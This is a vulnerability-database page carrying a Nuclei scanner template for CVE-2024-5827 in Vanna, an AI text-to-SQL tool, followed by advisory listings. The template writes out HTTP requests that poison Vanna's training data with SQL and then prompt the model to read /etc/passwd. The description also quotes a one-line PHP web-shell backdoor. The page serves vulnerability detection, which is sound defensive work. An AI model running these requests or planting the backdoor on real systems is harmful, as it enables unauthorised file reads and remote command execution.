| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| The vulnerability in the Flask web interface for generating queries to the Vanna database allows a hacker to write arbitrary files and execute arbitrary commands. | 7 Aug 202400:00 | – | bdu_fstec | |
| CVE-2024-5827 | 12 May 202500:00 | – | circl | |
| Vanna Code Issue Vulnerability | 28 Jun 202400:00 | – | cnnvd | |
| CVE-2024-5827 | 28 Jun 202419:27 | – | cve | |
| CVE-2024-5827 Arbitrary File Write by Prompt Injection via DuckDB SQL in vanna-ai/vanna | 28 Jun 202419:27 | – | cvelist | |
| CVE-2024-5827 | 28 Jun 202420:15 | – | nvd | |
| PT-2024-5388 · Duckdb +2 · Duckdb +2 | 16 Apr 202400:00 | – | ptsecurity | |
| CVE-2024-5827 | 5 Feb 202506:25 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-5827 | 5 Dec 202400:00 | – | vulncheck_kev | |
| CVE-2024-5827 Arbitrary File Write by Prompt Injection via DuckDB SQL in vanna-ai/vanna | 28 Jun 202419:27 | – | vulnrichment |
id: CVE-2024-5827
info:
name: Vanna - SQL injection
author: olfloralo,nukunga,harksu,nechyo,gy741
severity: critical
description: |
Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
impact: |
Unauthenticated attackers can exploit SQL injection to inject malicious training data and write arbitrary files on the victim's filesystem, including PHP backdoors, leading to remote code execution.
remediation: |
Update Vanna to version 0.3.5 or later to address the SQL injection vulnerability in the DuckDB integration.
reference:
- https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca
- https://nvd.nist.gov/vuln/detail/CVE-2024-5827
- https://huntr.com/bounties/e4e64a51-618b-41d0-8f56-1d2146d8825e
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5827
cwe-id: CWE-434
epss-score: 0.03452
epss-percentile: 0.87581
metadata:
verified: true
max-request: 2
fofa-query: body='vanna.ai'
tags: cve,cve2024,vanna,sqli,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/v0/train HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"sql":"SELECT pg_read_file('/etc/passwd', 0, 1000);"}
matchers:
- type: word
words:
- 'id":'
internal: true
- raw:
- |
GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
- type: word
part: header
words:
- 'application/json'
# digest: 490a0046304402202996e1ac397930e6f106675d423b030dde4033485cee8bf9ea0e7d64e8e4b8810220269d3f4026018bf68cc6a179d3341908da3b8e113d395ccdb8133b0d737cea4b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation